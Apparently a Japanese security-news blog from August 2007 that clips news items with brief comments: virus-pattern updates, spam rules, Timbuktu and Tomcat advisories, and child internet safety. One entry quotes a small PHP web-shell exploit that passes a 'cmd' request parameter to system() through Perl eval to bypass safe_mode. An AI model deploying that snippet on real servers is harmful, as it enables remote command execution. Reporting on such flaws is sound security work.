エクスプローラ風の圧縮・解凍ソフト「Explzh」が26日、フリーソフト化された。ソフト自体は更新されていないが、作者のホームページから試用制限を解除できるファイル“regist.lzh”を無料でダウンロードできる。


[]東芝、無線LANでポッドキャストが聞ける「ギガビート」新機種 デジタル家電&エンタメ-最新ニュース:IT-PLUS:

Mooさん経由

Gigabeat T401がでるそうです。無線LANも搭載しているそうです。こりゃーいいや。

東芝は28日、無線LAN機能を搭載した携帯音楽プレーヤー「ギガビート T401」を10月5日に発売すると発表した。語学番組やニュースなどのポッドキャストコンテンツを、パソコンを介さずダウンロードできる。価格はオープン価格だが、東芝の直販サイトで購入する場合は2万9800円。


[]5分で人を育てる技術 (25)“文書が上手いと言わせる”5つのテクニック(中篇):芦屋広太一つ上のヒューマンマネジメント:ITpro:

まずは結論から、あとは箇条書きで可能な限り見やすいように、図を使うなど技術がありますよねぇ。

"文書が上手いと言わせる"5つのテクニック

(1)構造化を行う。

(2)事実と意見,推定は分ける。

(3)意見,推定と主張には根拠を。

(4)主語を明確化する。

(5)省略しない。

また,その他の留意点として,以下も非常に重要な文書のポイントになります。

(1)結論が先,各論が後

(2)大事なことが先,そうでないものは後,どうでもよいことは書かない。

(3)(交渉録的要素が強い報告書や議事録などの場合) 「ペンディング項目を一覧化する」,「決定事項を一覧化する」,「いつまでに決着させるかを明確にする」

このチェックシートはよさそうだ。


[]アークン、DB脆弱性検査ツールを無償提供へ − @IT:

データベース脆弱性スキャナを無償提供だそうです。

これはおもしろそうだ。

セキュリティ関連のアークンは8月28日、米インパーバが開発したデータベース脆弱性スキャナ「Scuba by Imperva」(以下、Scuba)を8月29日より無償で提供開始すると発表した。ScubaはJavaで書かれたユーティリティで、350以上の評価テスト項目を検査する。OracleMicrosoft SQL ServerDB2Sybaseに対応する。データベースに対してSQLインジェクションバッファオーバーフローの問題がないかなどを検査するほか、安易なパスワードが用いられていないか、危険なプロセスは存在しないか、アクセス権限に問題はないかといった設定上の問題も検出する。


[]ウイルス検索エンジン サポート終了バージョンのお知らせ

2008年02月29日で旧検索エンジンがサポート終了するそうです。アップデート今から計画しましょう。

ウイルス検索エンジン VSAPI 8.500 のリリースに伴い、旧バージョンのサポート終了日が決定いたしましたので、以下にご案内いたします。

サポート終了日サポート終了製品バージョン
2008年2月29日ウイルス検索エンジン VSAPI8.000 / 8.100 / 8.3xx


[]脆弱性:DAT5083以前のバージョンで、スキャンプロセスが予期せず終了する

セキュメモ経由

脆弱性ってかいてあるんですが・・・・DoSを受ける脆弱性みたいです。既に対応済みみたいです。

5083以前のウイルス定義ファイルに、特殊なアーカイブファイルにより、スキャンプロセスが予期せず終了する問題が存在します。これらのアーカイブは機能せず、圧縮解除は行えません。また、悪質ソフトウェアの隠蔽に利用することもできません。攻撃に成功しても、マシンで実行中のオンアクセススキャナに対する長期的な影響はありません。

この問題を修正したウイルス定義ファイル(DAT)5084を、2007年7月26日に、すべてのアップデートサーバアップロードしました。


[]asahi.com:経産省も迷惑メール規制強化へ 送信に消費者の承諾 - 暮らし

迷惑メール対策で、オプトインの対応ってどうするんだろ・・・・手法はスパムなのにオプトインは送ってもかまわない・・・

まぁ、自衛のために止めることは問題ないのかな?>どうなんすかね?id:stealthinuさん

宣伝・広告目的でパソコン携帯電話に一方的に送られる「迷惑メール」について、総務省に続いて経済産業省も規制を強化する。インターネット小売業者などメールの広告主に、消費者の承諾を得ずにメールを送ることを禁じる。総務省は送信業者に対して未承諾メールの送信を禁じる方針で、送信業者と広告主の双方への規制強化で迷惑メールの抑え込みを目指す。


[]Internet Week 2007 開催のお知らせ

InternetWeek2007が今年も開催です。場所は秋葉原らしいです。

Internet Week」は、インターネットに関する技術の研究・開発、 構築・運用サービスに関わる人々が一堂に会し、 関心を持つテーマについて議論し、 理解と交流を深めるためのイベントです。

今年は、かねてより来場者からのご要望が多かった「東京」へと場所を移し、 アクセスが便利になりました。 また、参加者の皆様に役立つプログラムも多数ご用意しています。 第一線で活躍される技術者による講演があり、 また、インターネット関係者がこの場でしか話せないような問題について議論する場となっているのも、 今回の特色の一つです。

正式名称Internet Week 2007
開催地秋葉原コンベンションホール(東京都千代田区外神田1-18-13) http://www.akibahall.jp/
開催日程2007年11月19日(月)から11月22日(木) 4日間
内容カンファレンス/ワークショップ/BoF/懇親会
主催社団法人日本ネットワークインフォメーションセンター(JPNIC)


[]Microsoftの海賊版対策プログラムでトラブル,正規版Windowsを海賊版と誤判定:ITpro

例のWGAのダウンの関係かな。一部認証が誤判定されたそうです。

8月24〜25日(米国時間)の24時間のあいだに米MicrosoftWebサイトからソフトウエアアップデートダウンロードしようとした数百万人ものWindowsユーザーが,悪名高い海賊版対策プログラム「Windows Genuine Advantage(WGA)」のバグのせいで正規版Windowsを海賊版と誤判定された。正規版ユーザーに対するWGAの裏切り行為はこれが初めてではないが,影響を受けたユーザーの数は今回が最も多かったはずだ。Microsoftによると,サーバーに何らかの問題があって誤判断が生じ,すでに修正を終えたという。

サーバでこれは、厳しいな・・・・

MicrosoftのWGA担当上級製品マネージャであるAlex Kochis氏は「誤った検証結果を受け取った場合,当社のWebサイトで再検証すればシステムを修正できる」としている。「再検証をパスしたら,正規版 Windowsだけで利用可能な機能を確実に復旧するため,システムの再起動が必要」


[]「開発者の10.1%が起業」、IPAが未踏ソフトウェア創造事業の成果を報告:ITpro:

未踏すげぇ。既に起業してる人も含めたらすごいパーセンテージだ。

「事業の成果を基に会社を設立した人の比率は10.1%に上る。これは、米国の調査による各国の一般事業化率を大きく上回る数字だ」。情報処理推進機構IPA)は2007年8月27日に報道機関向けの説明会を開催、「未踏ソフトウェア創造事業」の事業化率が高いことなどを挙げて同事業が順調に推移していることを強調した。

あんな人もこんな人も未踏からだったんですね。

Namazu」の開発者である高林哲氏、「SoftEther」の登大遊氏、「Ruby」の松本行弘氏は、いずれもこの事業の出身者だ。


[]ネットレイティングス、総利用時間からみたポータルの利用特性調査

Yahoo!ではオークションが多いんですねぇ。たしかに見て回るから時間がすぐに過ぎますよね。

Yahoo! JAPANは、7月の総利用時間86.3億分のうちオークションが26%を占め、トップページの15%を上回った。3位以下はメール(7%)、ニュース(7%)、検索(6%)などが続いた。メールは各ポータルで上位にランクインしているが、特にMSN/Windows Live(総利用時間4.8億分)では全体の34%を占め、2位のトップページ(21%)や3位の検索(17%)を抑えた。

まぁ利用時間なので、滞在時間が多いコンテンツが上位を占めると思うんですが、実際に長く見られるのは、オークションとかそういうもので、広告業といういみではそこをターゲットにやっていく必要があるということですな。

ネットレイティング代表取締役社長兼チーフアナリストの萩原雅之氏は、「今回のデータを見ると、各ポータルサイト利用者が、実際どのコンテンツに時間を費やしているのかが一目瞭然。その利用特性は各ポータルサイトの個性を浮き彫りとし、改めて媒体価値を明示している。一方、共通して利用時間の上位に入っているメール、検索、ニュースは、ポータルサイトの媒体価値の形成に欠かすことのできないチャネルになっている」とコメントしている。


[]議論すべき会議とそうでない会議 − @IT自分戦略研究所

検討会と報告会の違いは確かにしっかりしないと、会議が迷走しますね。

会議体を開催するに当たって、報告会1、報告会2、検討会1みたいに、きちんとアジェンダを事前に準備する事が大切ですね。

「報告会」は「検討会」と異なる

ここで、「報告会」と「検討会」の違いについて考えましょう。

上で説明したように、「検討会」は、事前に定義された明確な議題・テーマについて、何らかを検討する会議です。議論は積極的にすべきです。また、「検討会」において、自分が正しいと思う方向性や結果に議論を導くためには、ある程度、発言を多くしないと、ほかの参加者に主導権を握られてしまいます。会議を実り多きものにするために、発言が多いことはよいことだとされるべきでしょう。

一方で、「報告会」は「検討会」と異なります。「報告会」では、「検討会」において、現場・チームで各種検討した状況(進ちょく状況も含みます)や検討結果(課題やリスクなども含みます)をまとめ、現場・チームのリーダー格が報告し、それを受けて、意思決定する会議といえます。

 「検討会」との大きな違いは、特定のテーマ・議題を検討することが目的ではないということです。あえていえば、プロジェクトの運営という漠然としたテーマがあるだけです。

5分以上議論することは避けるべき。検討会では検討なのでよいですが、時間はきちんと決めて検討する必要がありますね。

報告会で議論するのは間違えですね。

明治大正を通じで名宰相といわれた原敬氏は、よくこういったといいます。「5分以上議論する人間はばかだ」

これをこのまま、「検討会」に当てはめることはできません。「検討会」において、ある程度時間をかけて議論する必要があります。

ただ、「報告会」について考えると、これは真理なのではないかと思います。

「報告会」において、細かい議論が目安として5分以上続いたら、「報告会」の目的から外れ始めていると認識した方がいいでしょう。


[]ITmedia エンタープライズ:振る舞い検知などマルウェア対策機能を追加したアンチスパイウェア新版

Webrootソフトウエアがスパイウエア対策ソフトの新バージョンを出したそうです。

振る舞い検知と添付ファイルスキャンに対応したそうです。Sophosのアンチウイルスエンジンを使っているそうです。

ウェブルート・ソフトウェアは8月28日、スパイウェア対策ソフトの新バージョン「Spy Sweeper with AntiVirus 5.5」を発売した。最新バージョンでは、未知の脅威に対応するマルウェアの振る舞い検知やメール添付ファイルスキャンの機能を追加したのが特徴。

Spy Sweeperはスパイウェアを検出、削除するスパイウェア対策機能にウイルス対策機能を組み入れたソフトウェアウイルス対策機能はSophosの技術をライセンスしており、新バージョンでは同社の振る舞い検知技術「Behavioral Genotype」を利用して未知のマルウェアによるゼロデイ攻撃を防ぐことができる。また、電子メールの添付ファイルスキャンして、有害なプログラムやコンテンツを含むファイルを自動的に検疫する機能を新たにサポートした。


[]「防災週間」にはデータバックアップ、シマンテックが提案 − @IT

防災週間にバックアップの動作確認を全部してみるのもよいかもしれませんね。結構とれていなかったりしますよ。

シマンテックは8月27日、「防災週間」(8月30日〜9月5日)にからめてデジタルデータのバックアップを提案する文書を発表した。同社の調査によるとデジタルデータのデータ量と重要性は年々増しているものの、バックアップの実施率は高くない。同社は「ソフトウェアの機能を使うことで、バックアップは飛躍的に簡単な作業になる」としている。

一般ユーザーだけでなく企業ユーザーも再確認、棚卸しは必要だと思います。是非バックアップの状況確認を!

実際、データを損失するケースも多い。調査によると5人に1人が大切なデータを過去1年以内に損失。損失したデータを「ほとんど復元できなかった」ケースは60.2%に及ぶ。バックアップが行われていないのは、「面倒」「やり方が分からない」などが理由。シマンテックは自社のソフトウェアノートン 360」を使ったバックアップを提案している。


星人星人 2007/08/31 00:02 USのサイトにCVSS Ratingも記載されるようになって良い感じ。
まぁ、タイムアウト設計は適切にねってことですかねぇ。>BEA07-87.02

2007年08月28日(火曜日) 民放テレビスタ-トの日

ripjyr2007-08-28

[][]パターンアップ-4.675.00

Trendmicroのパターンがアップしました。

パターン番号:4.675.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 特筆なし
亜種対応
 特筆なし


[]ありゃりゃ>早起き日記

f:id:ripjyr:20070828053542j:image

Warning: mysql_pconnect(): Too many connections in /var/websites/phplib/dbmanager.php on line 47
Could not connect 192.168.1.151:3306
Warning: mysql_query(): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /var/websites/phplib/dbmanager.php on line 95

Warning: mysql_query(): A link to the server could not be established in /var/websites/phplib/dbmanager.php on line 95
2002: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)

Warning: mysql_query(): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /var/websites/phplib/dbmanager.php on line 95

Warning: mysql_query(): A link to the server could not be established in /var/websites/phplib/dbmanager.php on line 95
2002: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)


[]今度は「RTFスパム」が出現、狙いはフィルターの回避:日経パソコンオンライン:

今度はRTFファイルスパム

宣伝文句などをメールの本文には書かず、添付ファイルに記載する迷惑メールが増えている。メール本文から迷惑メールかどうかを判断する迷惑メールフィルター迷惑メール対策ソフト)を回避するためである。

例えば2006年以降、伝えたい内容をGIFJPEG画像ファイルにして添付する「画像スパム」が激増。米シマンテックによれば、ピーク時の2007年1月には、迷惑メールの過半数が画像スパムだったという。

2007年6月には、広告などをPDFファイルにして添付した「PDFスパム」が出現。2007年7月にはExcelファイル拡張子がxls)を添付した「Excelスパム(XLSスパム)」が確認されている。


[]hackers @ microsoft

CGI Security経由

White HackerのBlogMSDN@Microsoftで公開されています。

Microsoft employs some of the best hackers in the world and actively recruits them and develops them. They work on all kinds of projects, whether it be in development, research, testing, management and of course security.


[]アプリの脆弱性診断ソフトをレンタルします − @IT:

サイオスとフォーティファイが月額レンタルのWebアプリ脆弱性検査ソフトサービス提供始めたそうです。

サイオステクノロジーとフォーティファイ・ソフトウェアは8月27日、アプリケーション脆弱性を発見、修正するフォーティファイのソフトウェア「Fortify SCA(Source Code Analysis Suite)」をレンタル提供するサービスを始めたと発表した。第1号顧客として富士フイルムへの提供が決まっている。

安い!3ヶ月レンタルでスタートアップ時点でソース検査をして、KnowHowを吸収してみる?それとも終わり間近に入れて検証させてみる?

レンタル期間は3カ月と6カ月。3カ月の場合は月42万円から、6カ月の場合は月36万円から。レンタルのため導入費用がかからず、短期の開発プロジェクトでも脆弱性発見ソフトウェアを使ったチェックが可能になると両社は説明している。


[]Motorola Timbuktu Multiple Buffer Overflow Vulnerabilities(Public Advisory: 08.27.07 // iDefense Labs:)

TimbuktuってMotorolaが買ってたのね・・・昔はよく使ったなぁ。システム権限を取得できる脆弱性が存在するそうです。

II. DESCRIPTION

Remote exploitation of multiple buffer overflow vulnerabilities within Motorola Inc.'s Timbuktu allows attackers to crash the service or potentially execute arbitrary code with SYSTEM privileges.

The first issue exists within the handling of malformed application level protocol requests. Certain requests lead to an arbitrary length overflow of a buffer located on the heap.

The second vulnerability exists within the processing of log in requests. By specifying an overly long user name, it is possible to cause heap corruption.

The third vulnerability specifically exists within the "Scanner" functionally. By running a malicious socket server on TCP port 407, an attacker is able to cause a buffer overflow with a malformed "HELLO" response packet.


[]Motorola Timbuktu Pro Directory Traversal Vulnerability(Public Advisory: 08.27.07 // iDefense Labs:)

Timbutku ProのSendリクエストにおいて、ディレクトリトラバーサル脆弱性が存在するそうです。

II. DESCRIPTION

Remote exploitation of a directory traversal vulnerability in Motorola Inc.'s Timbuktu Pro allows attackers to delete or create files with SYSTEM privileges.

When handling "Send" requests, Timbuktu does not properly check for directory traversal specifiers. Therefore, by including a sequence such as "../../../", an attacker is able to write outside of the intended location. Additionally, if the file already exists, the file is created with a new name. However, if the connection is broken before the transfer completes, Timbuktu will delete the originally specified file name instead of the new name.


[]PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32):

PHP 5.2.0以降に影響を受けるローカルPoCが出ています。StringUnicodeに変換する際にバッファオーバフローが発生するそうです。

// ==================================================================================
//
//  php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <boecke@herzeleid.net>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Various other functions are exploitable, all of which convert the
//      string argument(s) to unicode.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================


[]ダウンロードの詳細 : Tech・Ed 2007 Yokohama 「Tech・Ed 新聞」

先日初めてお会いしたひろえむさん経由

TechED新聞がダウンロード可能になっています。どっかに載ってたりしますw

「Tech・Ed 新聞」は、Tech・Ed 2007 Yokohama の会場で、開催期間中 (8 月 21 日 〜 8 月 24 日)、当日の予定や前日のレポートなどを掲載するために、毎日発行されている新聞です。おもに以下のような内容が盛り込まれています。

●前日のメイントピック、特別プログラムのレポートなど

● 開発者向けブレークアウト セッションレポート、コラム「ひと」など

IT Pro向けブレークアウト セッションレポートコミュニティ レポートなど

● 当日のブレークアウト セッションや見どころ紹介、コラム「セキュリティ川柳」


[]JR東海の「プラレール訓練」に見るタンジブル思考 - 情報インフラ24時 眠らないシステム [ITmedia オルタナティブ・ブログ]

プラレールを使った机上訓練だそうです。机上訓練をより現実味を帯びたものにするには、こういうツールがあれば、本当によいですよね。

プラレールと言えば子供のおもちゃですよね。青いプラスチックレールをいくつも繋げて線路を作り、その上を電池で動くプラスチック製の電車がガタガタ動くアレです。ですが、そんなおもちゃを会議室に広げ、真剣な顔で向かい合っている会社があります。それはJR東海です。

JR東海といえば、東海道新幹線という重要路線を抱える鉄道会社。まじめな会社ですから、社内で子供のおもちゃで遊んでいたら普通は怒られます。なのに、どうして会議室にプラレールを広げて大人が取り囲んでいるのか。

実は「プラレール訓練」というものだそうです。

BCPを立てるだけで満足してブラッシュアップもしていないところが多いと思いますが、ちょっとした発想の転換で訓練やブラッシュアップができるんですよね。

ITのシステム管理でどういうことができるか。仮想環境にデータをリストアしてみてシステム復旧をしてみるとか
システム復旧だけでなく、障害連絡や体制の確立ってものだけでも、よかったりします。
JR東海みたいに、もう少し発展させたら、、、、何ができますか?

近年、BCP(事業継続性計画)というキーワードが注目を集めるこの業界。BCPを一言で説明すると、システムにどのような障害が起ころうとも業務サービスを提供し続けるための計画です。

例えば、銀行のATMが停止したとしましょう。ほとんどの銀行では、代わりに窓口で預け入れや引き出し、振り替えなどをスムーズに行うことができます。これは、ATMが停止した際の業務手順が予め定義されているからです。

じゃあ、計画だけ立てれば十分でしょうか?

ムリです、実際に代替手段を使って訓練しなければ、有事の際には役に立たないでしょう。上記例で言えば、 ATM停止時のアナウンス方法や窓口への誘導、窓口内でのオペレーションについて、行員が訓練を行っている必要があります。

でも、最初に述べたように、影響の大きい障害ほど訓練するのが困難だったりします。


[]Double Whammy! Another Sony Case (And it’s Not BioShock)(F-Secure : News from the Lab:)

Sonyの指紋認証USBスティックにrootkitまがいが入っているそうです。確かにこれ刺して起動するとNo system diskとか言われるなぁ。

We received a report that our F-Secure DeepGuard HIPS system was warning about a USB stick software driver. The USB stick in question has a built-in fingerprint reader. The case seemed unusual so we ordered a couple of USB sticks with fingerprint authentication. We installed the software on a test machine and were quite surprised to see that after installation our F-Secure BlackLight rootkit detector was reporting hidden files on the system.

http://www.f-secure.com/weblog/archives/microvault_boxes.jpg

USM-Fって機種らしいですけど、c:\windowsってディレクトリが存在するそうです。そしてそれをWindowsAPIからは消しているそうです。

The Sony MicroVault USM-F fingerprint reader software that comes with the USB stick installs a driver that is hiding a directory under "c:\windows\". So, when enumerating files and subdirectories in the Windows directory, the directory and files inside it are not visible through Windows API. If you know the name of the directory, it is e.g. possible to enter the hidden directory using Command Prompt and it is possible to create new hidden files. There are also ways to run files from this directory. Files in this directory are also hidden from some antivirus scanners (as with the Sony BMG DRM case)  depending on the techniques employed by the antivirus software. It is therefore technically possible for malware to use the hidden directory as a hiding place.


[]Sophos Antivirus UPX and BZIP Denial of Service Vulnerabilities:

Sophos Antivirus にDoSを受ける複数の脆弱性が存在するそうです。

Sophos Antivirus is prone to multiple denial-of-service vulnerabilities.

A remote attacker may trigger these issues to deny service to legitimate users. Successful exploits may result in a crash of the antivirus engine or the exhaustion of disk space on affected computers.


[]SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc:

WGAサイトが落ちていたそうです。Microsoft的FAIL SAFEで行くと認証されないで○なんでしょうね。

we got reports (thanks Mike, Matt...) that Microsoft is having issues with its WGA validation servers. This may affect downloading some software from Microsoft as well as new Vista installs. From posts to a Microsoft forum, it looks like this may persist for a few days. I am not sure if the phone-based activation still works, but its something you may want to try.


[]PHP Perl Extension Safe_mode Bypass Exploit:

Windows環境のPHPのPerlExtensionでSafe_modeをバイパスするようなExploitが出ています。

##########################################################
###----------------------------------------------------###
###----PHP Perl Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

&cmd="dir"とかで受けると、それがSafeモードバイパスして実行されるみたい。

$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "</textarea>";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>"


[]Hiroshi Okunushi’s Blog ☆ミ : 【IIS7】 PHPカンファレンスにお邪魔します:

2007年09月01日にPHPカンファレンスがあって、MicrosoftPHPIISについてセッションするそうです。

日本PHPユーザ会 様 主催のPHPカンファレンス2007にお邪魔することが決定しました。

9/1 大田区産業プラザ 13:30〜です。 カンファレンス自身は朝からです。

PHPカンファレンス2007』開催のご案内

http://www.php.gr.jp/seminar/20070901/

Zend 様と一緒のセッションということでWixP(WindowsIIS、Database、PHP)の組合せの最新状況がどうなのかをお伝えしてきます。技術者として非常に楽しみにしています。


[]om’s System:Tech Ed 2007 Yokohama:

確かに言われているとおり、裾野を広げるためにセッションが多かったです。>そうMS社員にも伝えました。

確かにITを進めるためにプロジェクトリーダやお金を持っている人の底上げは重要なんですけどね。
特にセキュリティネタは少なかったw

その中での感想としては、レベルが年々落ちてない?

いや、セッション自体のレベルっていうわけじゃなく、300、400 っていうレベル。

通常、400 っていうとエキスパート レベルなんだけど、どう考えても 300 かそれ以下のレベルのセッションが多かった気がする。

ターゲットを広げてセッション レベルを落とすのはいいんだけど、表記は 300、400 のままじゃなく、200 にしてもいいのでは?


[]ういんの小ねた: ウイルスバスター2007 アンインストールできない、インストールに失敗する、ファイアウオールが有効にならない

Vistaウイルスバスター2007を入れるとFireWallが有効にならない現象があるそうですが、聞いたこと無いなぁ。

普通にウイルスバスター2007をインストールしようとすると

インストールに失敗しました」と出て引っかかり、それでも無視してインストールをすると

パーソナルファイアウオールがどうやっても効かなくなってしまうという症状があります。

どうも、ファイルへのアクセス権限が問題らしいです。

PCCToolsですね。2007には入ってなかったっけ?入ってたと思うけど。

ちなみに2006以前のものはウイルスバスターインストールフォルダの中に削除ツールも入ってます。(特に消したりしていなければ)


2007年08月27日(月曜日) [男はつらいよ]の日

ripjyr2007-08-27

[]別MLで「今日のお昼ご飯は○○でした」をしたら盛り上がってきたw


[][]パターンアップ-4.673.00

Trendmicroのパターンがアップしました。

パターン番号:4.673.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 MS06-012
  TROJ_PPDROP.I
亜種対応
 MS06-040
  BKDR_VANBOT.DS


[]no title

子供とパソコンってのを作ってみた。

このへんこのへんを参考に追記してみたいけど、関係する人Updateキボン!

MicrosoftUSのセキュリティについて

子供と契約書を結ぶあたりがアメリカらしい。

Pandaが出している子供とインターネットのお話

Canadaで出しているインターネットセキュリティfor Kidsのリンク集

ダウンロードを絶対しないってのも、必要ですな。

Microsoft Japanの翻訳ですね。

Microsoftのファミリーセキュリティの手順


aspxaspx 2007/08/27 13:51 某MLみたいじゃないですかー(投薬で眠...zz

ripjyrripjyr 2007/08/27 13:53 某ML(Openmya)は某なので、別MLにしてみましたw
   でも、みんなまじめに回答してくれるところがかわいいw

2007年08月25日(土曜日) 川柳発祥の日

ripjyr2007-08-25

[]JVNDB-2007-000597 - JVN iPedia - 脆弱性対策情報データベース:

Tomcatクッキーにおけるバックスラッシュの処理が不適切でセッションハイジャックされる脆弱性が存在するそうです!!!

Apache Tomcat には、クッキーにおける区切り文字の、バックスラッシュ「\」の取り扱いに不備が存在するために、セッションデータの ID などの重要な情報を奪取され、セッションハイジャック攻撃に利用される脆弱性が存在します。

Super危険ってことじゃないですか!!!

基本値: 10.0 (危険) [NVD値]

ほとんどパッチ出て無いじゃないですか・・・・・

影響を受けるシステム

Apache Software Foundation


[]JVNDB-2007-000596 - JVN iPedia - 脆弱性対策情報データベース:

Tomcatにもう一つクッキーの区切り文字のシングルクォートの処理が不適切でセッションハイジャックされるそうです!!!

Apache Tomcat には、クッキーにおける区切り文字の、シングルクオート「'」の取り扱いに不備が存在するために、セッションデータの ID などの重要な情報を奪取され、セッションハイジャック攻撃に利用される脆弱性が存在します。

これも超危険!!!

基本値: 10.0 (危険) [NVD値]

パッチ出てないし・・・ふぅ

影響を受けるシステム

Apache Software Foundation


[]「はてな」を作り出す人的ネットワークの仕組みとは:ネットワークコラム ─ @IT:

開発は会議室で起こってるんじゃないんだ、現場で起こってるんだ!ですなw

やっぱりプロトを作ってブラッシュアップってのがこの業界似合うのだろうなぁ。

リィモに限らず、この会社では新サービスは会議からは生まれない。「誰かがアイデアを出しモックアップを作る。それを全員で膨らまし、もみながら、盛り上げていく」(輿水氏)ことでリリースにこぎ着ける。そうやってリリースされたサービスは、社内の意見はもちろん、はてなアイデアなどに寄せられたユーザーの意見や要望を取り込み“走りながら”成長を続ける。

あらゆる事柄が会議での合議で進められ、妥協の積み重ねになりがちな一般的な企業とは懸け離れた体質がそこにはある。そういえば、以前、スティーブ・ジョブスの片腕でアップル本社のボードメンバーだったある人が筆者にいった言葉がある。「社内で誰も賛成する人間がいないアイデアだから成功する。iPodはそうやってできた」 。


[]ITIL Version 3はなぜ必要なのか(後編) − @IT情報マネジメント:

ITIL=インシデント管理やサービスデスクではなく、最終的に必要なのはサービスの向上であるということをITILv3では強調しているそうです。

――これまでは、ITILの実装をサービスデスクあるいはインシデント管理から始めるユーザー企業が多かったと思いますが、ITIL Version 3ではこれが変わるといえますか?

ニーヴス氏 これまでずっと、インシデント管理は最も始めやすい部分だと考えられてきました。「患者の容体を安定させることができる」という点で、その意味は大きかったと思います。しかし多くの組織は、インシデント管理の導入で終わってしまっていました。インシデント管理を始めることで、IT組織のパフォーマンスはどんどん上昇します。しかしある時点から、逆に下がり始めることがあります。インシデント管理をうまくこなせるようになったとしても、ほかのことをすべて止めてしまうことで、状況を悪化させることがあるのです。インシデントがなくなることはありません。サービスの復旧は非常にうまくなっても、根本的な原因に対処しないままだと、こういうことが起こります。


[]パソコンのツボ 〜Office のTIP: ウィルスバスターで、”ADW_CNSADD.Z”が検出される:

スパイウエアパターン:0.523.00でJWORDDLLADW_CNSADD.Zで誤検知していたそうです。

スパイウェアパターンファイル0.523.00において誤警告の発生を確認しました。この誤警告はスパイウェアパターンファイル0.525.00以降で修正されています。この検出があった場合には最新のパターンファイルを使用して、再度検出を確認してください。

気づかなかったのはJWORDを入れていなかったからw

2007年8月24日現在、同ソフトスパイウェアパターンファイルは、"0.526.05"にアップデートされていますので、通常のアップデートで定義ファイルを最新のものに更新すれば次回以降は誤って検出されることはなくなります。

上記のトレンドマイクロHPによれば、"ADW_CNSADD.Z"は、JWORDコンポーネントである"jwdtabar.DLL"というファイルを検出して表示されるようです。JWORDをご利用であれば、単純に誤検出されないようにアップデートすることで解消いたします。

追記:これはいかんやろ!誤検知が検知の一位って・・・

f:id:ripjyr:20070825221719j:image

関連URL


[]ITmedia エンタープライズ:子どもは誰の背中を見て育つ?

最近は幼稚園や小学生でもインターネットを使える子供が増えてきています。でもセキュリティ教育ってのはありませんねぇ。

2006年に行われた調査によると、3割の子どもが就学前にインターネットを経験しているという。インターネット利用の低年齢化が進んでいるだけに、使い始めの段階で正しい使い方やモラルを教育することは、今後必要不可欠になってくるだろう。

大人がこのあたりは、コントロールする必要がありますね。

このような状態を、子どもはどう感じるのだろう。インターネットを利用し始めた段階でこういった環境に否応なしにさらされてしまう子どもは、その状況を当たり前のものとして受け入れるかもしれない。その結果、インターネット犯罪の低年齢化に拍車がかかるのではないかと考えるだけでぞっとしてしまう。子どもの規範となるべき大人は、こうした事態が子どもに悪影響を与えてしまう可能性があることを今一度考え直す必要がある。

このあたりは、某所で、はなずきん♪さんと、セバスチャンとディスカッションしました。

そのうちOutputが出てくると思いますよ。


[]親と子供のパソコンとのつきあい方って、こんなのかな?>セバスチャン+はなずきん♪さん

追記:no titleを作ってみた。

no title - まっちゃだいふくの日記★とれんどふりーく★この辺参照。

パソコン

事前準備

 → 年齢に問わず18歳未満の家庭では、URLフィルタ及び保護者による保護を実施する)

 → インターネットには、見るだけでお金を払わせられたり、子供が見てはいけないページがあるんだよ、だから、見たらいけないページはこういうページが出るからね。と教えておく

 → 可能であればリビングにパソコンを設置してみんな見ている状況でパソコンをさわらせること

ステージ

 → パソコンは時間を指定してやらせる(20分とか)

ステージ

 → 親が後ろについてゲームインターネットをやらせる(時間を決めて)

ステージ

 → 親は後ろにつかないが時間を決めてゲームインターネットをやらせる

ゲーム

ステージ1(Windows標準ゲーム

 → 特になし

ステージ2(独自導入ゲームネットゲーム)(CEROレーティングを守ったゲーム

 → 特になし

教育

 → 自分のリアルな情報(写真、名前など)を出すことで、ストーカーやいじめにもつながることを認識させる

 → 自由にできることがわかったら、インターネットでも最終的には個人を特定できることや、匿名など無いことを説明して自分の行動に責任を持つことを教える

ステージ3(ネットゲームCEROレーティングを守ったゲーム

 →インターネットに準拠(プライバシー情報や嫌がらせを受けないように教育必要)

インターネット

教育

 → インターネットの危険やフィルタについて説明

ステージ

 → 親が決められたページを指定)後ろで見る

ステージ

 → 親がブックマークしたページを自分で閲覧)後ろで見る

教育

 → 自分のリアルな情報(写真、名前など)を出すことで、ストーカーやいじめにもつながることを認識させる

ステージ

 → URLフィルタの中で自分で自由に閲覧)後ろで見る

教育

 → 自由にできることがわかったら、インターネットでも最終的には個人を特定できることや、匿名など無いことを説明して自分の行動に責任を持つことを教える

ステージ

 → Updateキボン

メール

 → Updateキボン

携帯

 → Updateキボン


vulcainvulcain 2007/08/25 13:41 WebLogic以外の殆どのJavaアプリケーションサーバってTomcatをWebコンテナとして使ってるから、Tomcatのこの手の脆弱性ってかなり危険・・・

ripjyrripjyr 2007/08/25 22:04 ↑かなり危険ですよねぇ。セッションフィクセーションとかできちゃうと
   超危険どころじゃないですよね。。。

2007年08月24日(金曜日) 大噴火の日

ripjyr2007-08-24

[]no title

確かにブラウザによる比較してなかったな・・・ただ何となくレンダリングとかいろいろでFireFoxを使っていたりするが・・・比較してみよっと。

